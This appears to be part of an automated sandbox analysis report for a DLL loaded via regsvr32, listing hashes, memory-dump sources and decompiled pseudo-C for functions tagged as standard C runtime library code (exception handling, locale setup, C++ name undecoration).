Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: a6dea2fbb0ae2075eb9fe0f6b5096ad3541770c391177aeb214c7deedac596bb
Instruction ID: c97dc921d8f2b603509af20d51287e0cba44221e30795eb285d13a51fcb5b700
Opcode Fuzzy Hash: a6dea2fbb0ae2075eb9fe0f6b5096ad3541770c391177aeb214c7deedac596bb
Instruction Fuzzy Hash: 08D1A032B05B4189EB21CF92E9549EEB7A4FB8A784F404535DB8E43761EFB8D105E780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B067110 Relevance: 10.6, APIs: 7, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

_lock.LIBCMT ref: 00007FFD2B067139

Part of subcall function 00007FFD2B0696D8: _amsg_exit.LIBCMT ref: 00007FFD2B069702

DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FFD2B0672FD,?,?,00000000,00007FFD2B069707), ref: 00007FFD2B06716C
DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FFD2B0672FD,?,?,00000000,00007FFD2B069707), ref: 00007FFD2B06718A
DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FFD2B0672FD,?,?,00000000,00007FFD2B069707), ref: 00007FFD2B0671CA
DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FFD2B0672FD,?,?,00000000,00007FFD2B069707), ref: 00007FFD2B0671E4
DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FFD2B0672FD,?,?,00000000,00007FFD2B069707), ref: 00007FFD2B0671F4
ExitProcess.KERNEL32 ref: 00007FFD2B067280

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: DecodePointer$ExitProcess_amsg_exit_lock
String ID:
API String ID: 3411037476-0
Opcode ID: d0fb83b2607e3d83f24640c1ddc267e327605587e48f656ebec725bc9b5394dc
Instruction ID: 19fd63f215866f0b302d55064e0ed6c835a7cada7e8ed7f433c2790aa14e4c96
Opcode Fuzzy Hash: d0fb83b2607e3d83f24640c1ddc267e327605587e48f656ebec725bc9b5394dc
Instruction Fuzzy Hash: 2841A331B1BA4389E6439F51EE6123962A4FF9AB84F140035EE8D037B5DFBCE441A780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B07EF30 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00007FFD7FFD2B07EF30(void* __ecx, intOrPtr* __rcx, void* __rsi, void* __r8) {
				intOrPtr* _t17;

				_t11 = __ecx;
				_t17 =  *((intOrPtr*)(__rcx));
				if ( *_t17 == 0xe0434352) goto 0x2b07ef61;
				if ( *_t17 == 0xe0434f4d) goto 0x2b07ef61;
				if ( *_t17 != 0xe06d7363) goto 0x2b07ef7a;
				E00007FFD7FFD2B067F5C(__ecx,  *_t17 - 0xe06d7363, _t17, __rcx, __rsi, __r8);
				 *(_t17 + 0x100) =  *(_t17 + 0x100) & 0x00000000;
				E00007FFD7FFD2B072440( *_t17 - 0xe06d7363, _t17, __rcx);
				asm("int3");
				E00007FFD7FFD2B067F5C(_t11,  *_t17 - 0xe06d7363, _t17, __rcx, __rsi, __r8);
				if ( *(_t17 + 0x100) <= 0) goto 0x2b07ef7a;
				E00007FFD7FFD2B067F5C(_t11,  *(_t17 + 0x100), _t17, __rcx, __rsi, __r8);
				 *(_t17 + 0x100) =  *(_t17 + 0x100) - 1;
				return 0;
			}

0x7ffd2b07ef30
0x7ffd2b07ef34
0x7ffd2b07ef3d
0x7ffd2b07ef45
0x7ffd2b07ef4d
0x7ffd2b07ef4f
0x7ffd2b07ef54
0x7ffd2b07ef5b
0x7ffd2b07ef60
0x7ffd2b07ef61
0x7ffd2b07ef6d
0x7ffd2b07ef6f
0x7ffd2b07ef74
0x7ffd2b07ef80

APIs

_getptd.LIBCMT ref: 00007FFD2B07EF4F

Part of subcall function 00007FFD2B067F5C: _amsg_exit.LIBCMT ref: 00007FFD2B067F72

Part of subcall function 00007FFD2B072440: _getptd.LIBCMT ref: 00007FFD2B072444

_getptd.LIBCMT ref: 00007FFD2B07EF61
_getptd.LIBCMT ref: 00007FFD2B07EF6F

Strings

csm, xrefs: 00007FFD2B07EF47
RCC, xrefs: 00007FFD2B07EF37
MOC, xrefs: 00007FFD2B07EF3F

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _getptd$_amsg_exit
String ID: MOC$RCC$csm
API String ID: 2610988583-2671469338
Opcode ID: 6e2df090ba086a59c0383ae29f36c7551b2c077b2134757da0ca2b7865838cc4
Instruction ID: 4085cdb3d9fea869d3c4bd5ec9f60dd9f8d2f084fd931ddd387c285885a46ec8
Opcode Fuzzy Hash: 6e2df090ba086a59c0383ae29f36c7551b2c077b2134757da0ca2b7865838cc4
Instruction Fuzzy Hash: E7F03035B0B1038AE7162B20CA163B821A0EF9A705F869570C64C063A2CBFC6480FAD2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B070D8C Relevance: 9.1, APIs: 6, Instructions: 118
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E00007FFD7FFD2B070D8C(void* __ecx, void* __edx, void* __esp, void* __eflags, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __rbp, void* __r8, void* __r11, long long __r12, void* _a8, void* _a16, void* _a24, void* _a32) {
				intOrPtr _v24;
				void* _t43;
				signed int _t46;
				char _t52;
				void* _t66;
				signed int _t75;
				long long _t86;
				intOrPtr* _t87;
				long long _t90;
				long long _t99;
				long long _t106;
				long long _t109;
				void* _t114;
				void* _t119;

				_t114 = __r11;
				_t92 = __rcx;
				_t61 = __edx;
				_t55 = __ecx;
				_t86 = _t109;
				 *((long long*)(_t86 + 8)) = __rbx;
				 *((long long*)(_t86 + 0x10)) = __rsi;
				 *((long long*)(_t86 + 0x18)) = __rdi;
				 *((long long*)(_t86 + 0x20)) = __r12;
				_t66 = __ecx;
				r13d = r13d | 0xffffffff;
				E00007FFD7FFD2B067F5C(__ecx, __eflags, _t86, __rcx, __rsi, __r8);
				_t106 = _t86;
				E00007FFD7FFD2B070978(_t55, __edx, __eflags, _t86, __rbx, __rcx, _t106, __rbp, _t119);
				_t43 = E00007FFD7FFD2B070A34(_t66, __eflags, _t86);
				r12d = _t43;
				if (_t43 ==  *((intOrPtr*)( *((intOrPtr*)(_t106 + 0xb8)) + 4))) goto 0x2b070f47;
				E00007FFD7FFD2B0678EC(0x220, _t43 -  *((intOrPtr*)( *((intOrPtr*)(_t106 + 0xb8)) + 4)),  *((intOrPtr*)(_t106 + 0xb8)), _t92, __rdi, _t106);
				_t90 = _t86;
				if (_t86 == 0) goto 0x2b070f4c;
				r8d = 0x220;
				E00007FFD7FFD2B064B80(0x220, _t86, _t86,  *((intOrPtr*)(_t106 + 0xb8)), __r8);
				 *_t90 = 0;
				_t46 = E00007FFD7FFD2B070AC4(r12d, _t61, __esp, _t86, _t90, _t90, __r8, _t114);
				r13d = _t46;
				_t75 = _t46;
				if (_t75 != 0) goto 0x2b070f21;
				asm("lock dec dword [ecx]");
				if (_t75 != 0) goto 0x2b070e3b;
				if ( *((intOrPtr*)(_t106 + 0xb8)) == 0x2b0c78c0) goto 0x2b070e3b;
				free(??);
				 *((long long*)(_t106 + 0xb8)) = _t90;
				asm("lock inc dword [ebx]");
				if (( *(_t106 + 0xc8) & 0x00000002) != 0) goto 0x2b070f4c;
				if (( *0x2b0c7df0 & 0x00000001) != 0) goto 0x2b070f4c;
				E00007FFD7FFD2B0696D8();
				 *0x2b0c9afc =  *((intOrPtr*)(_t90 + 4));
				 *0x2b0c9b00 =  *((intOrPtr*)(_t90 + 8));
				 *0x2b0c9b04 =  *((intOrPtr*)(_t90 + 0xc));
				_v24 = 0;
				if (0 - 5 >= 0) goto 0x2b070eae;
				 *0x7FFD2B0C9AF0 =  *(_t90 + 0x10) & 0x0000ffff;
				goto 0x2b070e90;
				_v24 = 0;
				if (0 - 0x101 >= 0) goto 0x2b070ecf;
				 *0x7FFD2B0C7AE0 =  *((intOrPtr*)(0 + _t90 + 0x1c));
				goto 0x2b070eb0;
				_v24 = 0;
				if (0 - 0x100 >= 0) goto 0x2b070ef1;
				_t52 =  *((intOrPtr*)(0 + _t90 + 0x11d));
				 *0x7FFD2B0C7BF0 = _t52;
				goto 0x2b070ecf;
				_t87 =  *0x2b0c7cf0; // 0xbe1d30
				asm("lock dec dword [eax]");
				if (0 != 0x100) goto 0x2b070f0e;
				_t99 =  *0x2b0c7cf0; // 0xbe1d30
				if (_t99 == 0x2b0c78c0) goto 0x2b070f0e;
				free(??);
				 *0x2b0c7cf0 = _t90;
				asm("lock inc dword [ebx]");
				E00007FFD7FFD2B0695B8();
				goto 0x2b070f4c;
				if (_t52 != 0xffffffff) goto 0x2b070f4c;
				if (_t90 == 0x2b0c78c0) goto 0x2b070f3a;
				free(??);
				E00007FFD7FFD2B067698(_t87);
				 *_t87 = 0x16;
				goto 0x2b070f4c;
				r13d = 0;
				return r13d;
			}

0x7ffd2b070d8c
0x7ffd2b070d8c
0x7ffd2b070d8c
0x7ffd2b070d8c
0x7ffd2b070d8c
0x7ffd2b070d8f
0x7ffd2b070d93
0x7ffd2b070d97
0x7ffd2b070d9b
0x7ffd2b070da5
0x7ffd2b070da7
0x7ffd2b070dab
0x7ffd2b070db0
0x7ffd2b070db3
0x7ffd2b070dc1
0x7ffd2b070dc6
0x7ffd2b070dcc
0x7ffd2b070dd7
0x7ffd2b070ddc
0x7ffd2b070de4
0x7ffd2b070df4
0x7ffd2b070dfa
0x7ffd2b070dff
0x7ffd2b070e07
0x7ffd2b070e0c
0x7ffd2b070e0f
0x7ffd2b070e11
0x7ffd2b070e25
0x7ffd2b070e28
0x7ffd2b070e34
0x7ffd2b070e36
0x7ffd2b070e3b
0x7ffd2b070e42
0x7ffd2b070e4c
0x7ffd2b070e59
0x7ffd2b070e66
0x7ffd2b070e6f
0x7ffd2b070e78
0x7ffd2b070e81
0x7ffd2b070e90
0x7ffd2b070e97
0x7ffd2b070ea1
0x7ffd2b070eac
0x7ffd2b070eb0
0x7ffd2b070eba
0x7ffd2b070ec3
0x7ffd2b070ecd
0x7ffd2b070ecf
0x7ffd2b070ed9
0x7ffd2b070ede
0x7ffd2b070ee5
0x7ffd2b070eef
0x7ffd2b070ef1
0x7ffd2b070ef8
0x7ffd2b070efb
0x7ffd2b070efd
0x7ffd2b070f07
0x7ffd2b070f09
0x7ffd2b070f0e
0x7ffd2b070f15
0x7ffd2b070f1a
0x7ffd2b070f1f
0x7ffd2b070f24
0x7ffd2b070f30
0x7ffd2b070f35
0x7ffd2b070f3a
0x7ffd2b070f3f
0x7ffd2b070f45
0x7ffd2b070f49
0x7ffd2b070f69

APIs

_getptd.LIBCMT ref: 00007FFD2B070DAB

Part of subcall function 00007FFD2B067F5C: _amsg_exit.LIBCMT ref: 00007FFD2B067F72

Part of subcall function 00007FFD2B070978: _getptd.LIBCMT ref: 00007FFD2B070982
Part of subcall function 00007FFD2B070978: _amsg_exit.LIBCMT ref: 00007FFD2B070A1F

Part of subcall function 00007FFD2B070A34: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,00007FFD2B070DC6,?,?,?,?,?,00007FFD2B070F83), ref: 00007FFD2B070A5E

Part of subcall function 00007FFD2B0678EC: Sleep.KERNEL32(?,?,?,00007FFD2B069651,?,?,?,00007FFD2B0696FB,?,?,?,?,?,?,00000000,00007FFD2B067F30), ref: 00007FFD2B06792A

free.LIBCMT ref: 00007FFD2B070E36

Part of subcall function 00007FFD2B06640C: RtlReleasePrivilege.NTDLL(?,?,00000000,00007FFD2B067F44,?,?,?,00007FFD2B0676A1,?,?,?,?,00007FFD2B065382), ref: 00007FFD2B066422
Part of subcall function 00007FFD2B06640C: _errno.LIBCMT ref: 00007FFD2B06642C
Part of subcall function 00007FFD2B06640C: GetLastError.KERNEL32(?,?,00000000,00007FFD2B067F44,?,?,?,00007FFD2B0676A1,?,?,?,?,00007FFD2B065382), ref: 00007FFD2B066434

_lock.LIBCMT ref: 00007FFD2B070E66
free.LIBCMT ref: 00007FFD2B070F09
free.LIBCMT ref: 00007FFD2B070F35
_errno.LIBCMT ref: 00007FFD2B070F3A

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: free$_amsg_exit_errno_getptd$ErrorLastPrivilegeReleaseSleep_lock
String ID:
API String ID: 441742810-0
Opcode ID: d760397185f36797921a454ceceac083bf9007480528e2f1f060533bce753b25
Instruction ID: d54768853490804e7edb807516a6bcc8ab268380eaeb97e80c7a5814b3c6be54
Opcode Fuzzy Hash: d760397185f36797921a454ceceac083bf9007480528e2f1f060533bce753b25
Instruction Fuzzy Hash: 0051E631B0A64245E7529B209E60A7AB7A1FB42B44F144235DA5E437F6DFBCE441F3D0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B06CF0C Relevance: 9.1, APIs: 6, Instructions: 110
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 79%

			E00007FFD7FFD2B06CF0C(signed int __ecx, void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r10, void* __r11) {
				void* _t43;
				signed int _t47;
				char* _t64;
				char* _t65;
				char* _t68;
				intOrPtr* _t83;
				signed long long* _t85;
				void* _t86;
				void* _t90;
				long long _t92;
				void* _t94;
				void* _t95;
				void* _t97;
				void* _t98;
				void* _t104;
				void* _t106;
				long long _t107;
				void* _t109;
				long long _t110;
				void* _t112;
				long long _t113;

				_t92 = __rsi;
				_t86 = __rdx;
				_t71 = __rbx;
				 *((long long*)(_t97 + 8)) = __rbx;
				 *((long long*)(_t97 + 0x10)) = __rsi;
				 *((long long*)(_t97 + 0x20)) = __rdi;
				_t95 = _t97 - 0x80;
				_t98 = _t97 - 0x180;
				_t64 =  *0x2b0c9a70; // 0x0
				r12b = __edx;
				_t90 = __rcx;
				if ( *_t64 != 0x3f) goto 0x2b06d0ab;
				if ( *((char*)(_t64 + 1)) != 0x24) goto 0x2b06d0ab;
				_t107 =  *0x2b0c9a30; // 0x0
				_t110 =  *0x2b0c9a60; // 0x0
				_t113 =  *0x2b0c9a68; // 0x0
				_t47 = __ecx | 0xffffffff;
				_t65 = _t64 + 2;
				 *(_t98 + 0x60) = _t47;
				 *(_t95 - 0x40) = _t47;
				 *(_t95 + 0x20) = _t47;
				 *0x2b0c9a70 = _t65;
				 *0x2b0c9a30 = _t98 + 0x60;
				 *((char*)(_t95 + 0xc0)) = 0;
				 *0x2b0c9a60 = _t95 - 0x40;
				 *0x2b0c9a68 = _t95 + 0x20;
				if ( *_t65 != 0x3f) goto 0x2b06cfd7;
				_t66 = _t65 + __rsi;
				 *0x2b0c9a70 = _t65 + __rsi;
				E00007FFD7FFD2B06C7D0(sil, __rbx, _t98 + 0x30, __rcx, __rsi, _t95 + 0xc0, __r10, __r11);
				goto 0x2b06cfdf;
				r8b = sil;
				E00007FFD7FFD2B06D0E0(_t47, sil, 1, _t71, _t98 + 0x30, _t90, _t92, _t95 + 0xc0, __r10, __r11, _t112, _t109, _t106, _t104);
				asm("movups xmm0, [eax]");
				asm("movdqu [esp+0x20], xmm0");
				_t36 =  ==  ? 1 :  *0x2b0c9a98 & 0x000000ff;
				 *0x2b0c9a98 =  ==  ? 1 :  *0x2b0c9a98 & 0x000000ff;
				if ( *((intOrPtr*)(_t95 + 0xc0)) != 0) goto 0x2b06d08b;
				E00007FFD7FFD2B06C55C(_t71, _t98 + 0x50, _t86, _t90, _t92, _t95 + 0xc0, __r10, __r11);
				E00007FFD7FFD2B06A9A8(0x3c, _t66, _t98 + 0x40);
				asm("movups xmm0, [eax]");
				asm("movdqu [esp+0x30], xmm0");
				E00007FFD7FFD2B06AC78(_t66, _t98 + 0x30, _t66);
				E00007FFD7FFD2B06AC78(_t66, _t98 + 0x20, _t98 + 0x30);
				_t83 =  *((intOrPtr*)(_t98 + 0x20));
				if (_t83 == 0) goto 0x2b06d064;
				if ( *((intOrPtr*)( *_t83 + 8))() != 0x3e) goto 0x2b06d064;
				E00007FFD7FFD2B06AF5C(0x20, 1,  *_t83, _t66, _t98 + 0x20, _t92, _t95 + 0xc0, _t94);
				_t85 = _t98 + 0x20;
				_t43 = E00007FFD7FFD2B06AF5C(0x3e, 1,  *_t83, _t66, _t85, _t92, _t95 + 0xc0);
				if (r12b == 0) goto 0x2b06d08b;
				_t68 =  *0x2b0c9a70; // 0x0
				if ( *_t68 == 0) goto 0x2b06d08b;
				 *0x2b0c9a70 = _t68 + _t92;
				asm("movups xmm0, [esp+0x20]");
				 *0x2b0c9a30 = _t107;
				 *0x2b0c9a60 = _t110;
				 *0x2b0c9a68 = _t113;
				asm("movdqu [edi], xmm0");
				goto 0x2b06d0ba;
				_t85[1] = _t85[1] & 0xffff00ff;
				 *_t85 =  *_t85 & 0x00000000;
				_t85[1] = 2;
				return _t43;
			}

0x7ffd2b06cf0c
0x7ffd2b06cf0c
0x7ffd2b06cf0c
0x7ffd2b06cf0c
0x7ffd2b06cf11
0x7ffd2b06cf16
0x7ffd2b06cf24
0x7ffd2b06cf29
0x7ffd2b06cf30
0x7ffd2b06cf37
0x7ffd2b06cf3a
0x7ffd2b06cf40
0x7ffd2b06cf4a
0x7ffd2b06cf50
0x7ffd2b06cf57
0x7ffd2b06cf5e
0x7ffd2b06cf65
0x7ffd2b06cf68
0x7ffd2b06cf6e
0x7ffd2b06cf72
0x7ffd2b06cf75
0x7ffd2b06cf82
0x7ffd2b06cf89
0x7ffd2b06cf94
0x7ffd2b06cf9a
0x7ffd2b06cfa8
0x7ffd2b06cfb7
0x7ffd2b06cfb9
0x7ffd2b06cfc3
0x7ffd2b06cfca
0x7ffd2b06cfd5
0x7ffd2b06cfd7
0x7ffd2b06cfda
0x7ffd2b06cfdf
0x7ffd2b06cfe9
0x7ffd2b06cff5
0x7ffd2b06cff8
0x7ffd2b06d000
0x7ffd2b06d00b
0x7ffd2b06d01a
0x7ffd2b06d027
0x7ffd2b06d02a
0x7ffd2b06d030
0x7ffd2b06d03f
0x7ffd2b06d044
0x7ffd2b06d04c
0x7ffd2b06d056
0x7ffd2b06d05f
0x7ffd2b06d064
0x7ffd2b06d06b
0x7ffd2b06d073
0x7ffd2b06d075
0x7ffd2b06d07f
0x7ffd2b06d084
0x7ffd2b06d08b
0x7ffd2b06d090
0x7ffd2b06d097
0x7ffd2b06d09e
0x7ffd2b06d0a5
0x7ffd2b06d0a9
0x7ffd2b06d0ab
0x7ffd2b06d0b2
0x7ffd2b06d0b6
0x7ffd2b06d0dd

APIs

UnDecorator::getZName.LIBCMT ref: 00007FFD2B06CFDA
DName::DName.LIBCMT ref: 00007FFD2B06D01A
DName::operator+=.LIBCMT ref: 00007FFD2B06D030
DName::operator+=.LIBCMT ref: 00007FFD2B06D03F
DName::operator+=.LIBCMT ref: 00007FFD2B06D05F
DName::operator+=.LIBCMT ref: 00007FFD2B06D06B

Part of subcall function 00007FFD2B06C7D0: DName::operator=.LIBCMT ref: 00007FFD2B06C865
Part of subcall function 00007FFD2B06C7D0: DName::DName.LIBCMT ref: 00007FFD2B06C880
Part of subcall function 00007FFD2B06C7D0: DName::operator+=.LIBCMT ref: 00007FFD2B06C895

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Name::operator+=$Name$Name::$Decorator::getName::operator=
String ID:
API String ID: 212298780-0
Opcode ID: 6b038015eec91a649b324f7f4d2e8a15648c67a5f8d942a2bd87b7c8591de4c9
Instruction ID: d850c08a2dafefa80f55df57b88482ba1e06881500b8211e57b5089f955a5ac8
Opcode Fuzzy Hash: 6b038015eec91a649b324f7f4d2e8a15648c67a5f8d942a2bd87b7c8591de4c9
Instruction Fuzzy Hash: 1051D422E0AB85C5E7138B22ED613B97360FB5A744F444271EA8D03BA5DFBCE546D780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B06B06C Relevance: 9.1, APIs: 6, Instructions: 86
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00007FFD7FFD2B06B06C(long long __rbx, signed long long* __rcx, void* __rdx, long long __rsi, void* __r8, long long _a8, long long _a16) {
				char _v24;
				char _v40;
				signed int _v48;
				signed long long _v56;
				void* __rdi;
				void* _t23;
				void* _t32;
				void* _t33;
				char* _t51;
				char* _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				signed long long* _t58;
				intOrPtr _t62;
				intOrPtr* _t65;
				intOrPtr _t76;
				void* _t83;
				void* _t84;
				intOrPtr _t85;
				void* _t87;

				_a8 = __rbx;
				_a16 = __rsi;
				 *__rcx =  *__rcx & 0x00000000;
				__rcx[1] = 0;
				__rcx[1] = __rcx[1] & 0xffff00ff;
				_t58 = __rcx;
				if (__rcx[1] != 0) goto 0x2b06b1be;
				_t51 =  *0x2b0c9a70; // 0x0
				if ( *_t51 == 0x40) goto 0x2b06b1be;
				if ( *_t51 == 0x5a) goto 0x2b06b1be;
				if (1 == 0) goto 0x2b06b0bd;
				goto 0x2b06b0ce;
				_t23 = E00007FFD7FFD2B06AF5C(0x2c, 0, _t51, __rcx, __rcx, __rsi, __r8);
				_t52 =  *0x2b0c9a70; // 0x0
				if ( *_t52 == 0) goto 0x2b06b18e;
				r8d =  *_t52;
				r8d = r8d - 0x30;
				if (r8d - 9 > 0) goto 0x2b06b10d;
				_t62 =  *0x2b0c9a30; // 0x0
				_t53 = _t52 + 1;
				_t7 =  &_v24; // 0x21
				 *0x2b0c9a70 = _t53;
				E00007FFD7FFD2B06A6DC(_t23, _t62, _t7);
				E00007FFD7FFD2B06AC78(_t53, _t58, _t53);
				goto 0x2b06b17b;
				_v56 = _v56 & 0x00000000;
				_v48 = _v48 & 0xffff0000;
				_t13 =  &_v40; // 0x11
				_t76 = _t53;
				E00007FFD7FFD2B07006C(_t32, _t33, 0x2c, 0, _t53, _t58, _t13,  &_v56, _t76, __rsi, __r8, _t83, _t84, _t87);
				_t85 =  *0x2b0c9a70; // 0x0
				if (_t85 - _t76 - 1 <= 0) goto 0x2b06b153;
				_t65 =  *0x2b0c9a30; // 0x0
				if ( *_t65 == 9) goto 0x2b06b153;
				_t14 =  &_v40; // 0x11
				E00007FFD7FFD2B06A67C(_t53, _t58, _t65, _t14, __r8);
				_t15 =  &_v40; // 0x11
				E00007FFD7FFD2B06AC78(_t53, _t58, _t15);
				_t54 =  *0x2b0c9a70; // 0x0
				if (_t54 != _t76) goto 0x2b06b182;
				_t58[1] = _t58[1] & 0xffff00ff;
				 *_t58 =  *_t58 & 0x00000000;
				_t58[1] = 2;
				_t55 =  *0x2b0c9a70; // 0x0
				if (_t58[1] == 0) goto 0x2b06b0a3;
				goto 0x2b06b1be;
				if (_t58[1] - 1 > 0) goto 0x2b06b1be;
				if ( *_t58 == 0) goto 0x2b06b1b1;
				E00007FFD7FFD2B06A12C(1, _t15);
				E00007FFD7FFD2B06A564(_t55, _t58, _t58, _t55, __r8);
				goto 0x2b06b1be;
				return E00007FFD7FFD2B06A640(1, _t55, _t58);
			}

0x7ffd2b06b06c
0x7ffd2b06b071
0x7ffd2b06b07b
0x7ffd2b06b07f
0x7ffd2b06b083
0x7ffd2b06b08e
0x7ffd2b06b096
0x7ffd2b06b09c
0x7ffd2b06b0a6
0x7ffd2b06b0af
0x7ffd2b06b0b7
0x7ffd2b06b0bb
0x7ffd2b06b0c2
0x7ffd2b06b0c7
0x7ffd2b06b0d1
0x7ffd2b06b0d7
0x7ffd2b06b0db
0x7ffd2b06b0e3
0x7ffd2b06b0e5
0x7ffd2b06b0ec
0x7ffd2b06b0ef
0x7ffd2b06b0f4
0x7ffd2b06b0fb
0x7ffd2b06b106
0x7ffd2b06b10b
0x7ffd2b06b10d
0x7ffd2b06b113
0x7ffd2b06b120
0x7ffd2b06b125
0x7ffd2b06b128
0x7ffd2b06b12d
0x7ffd2b06b13b
0x7ffd2b06b13d
0x7ffd2b06b147
0x7ffd2b06b149
0x7ffd2b06b14e
0x7ffd2b06b153
0x7ffd2b06b15b
0x7ffd2b06b160
0x7ffd2b06b16a
0x7ffd2b06b16c
0x7ffd2b06b173
0x7ffd2b06b177
0x7ffd2b06b17b
0x7ffd2b06b186
0x7ffd2b06b18c
0x7ffd2b06b192
0x7ffd2b06b198
0x7ffd2b06b19f
0x7ffd2b06b1aa
0x7ffd2b06b1af
0x7ffd2b06b1d0

APIs

DName::operator+=.LIBCMT ref: 00007FFD2B06B0C2
DName::operator+=.LIBCMT ref: 00007FFD2B06B106
DName::operator+=.LIBCMT ref: 00007FFD2B06B15B
DNameStatusNode::make.LIBCMT ref: 00007FFD2B06B19F
DName::append.LIBCMT ref: 00007FFD2B06B1AA
DName::operator=.LIBCMT ref: 00007FFD2B06B1B9

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

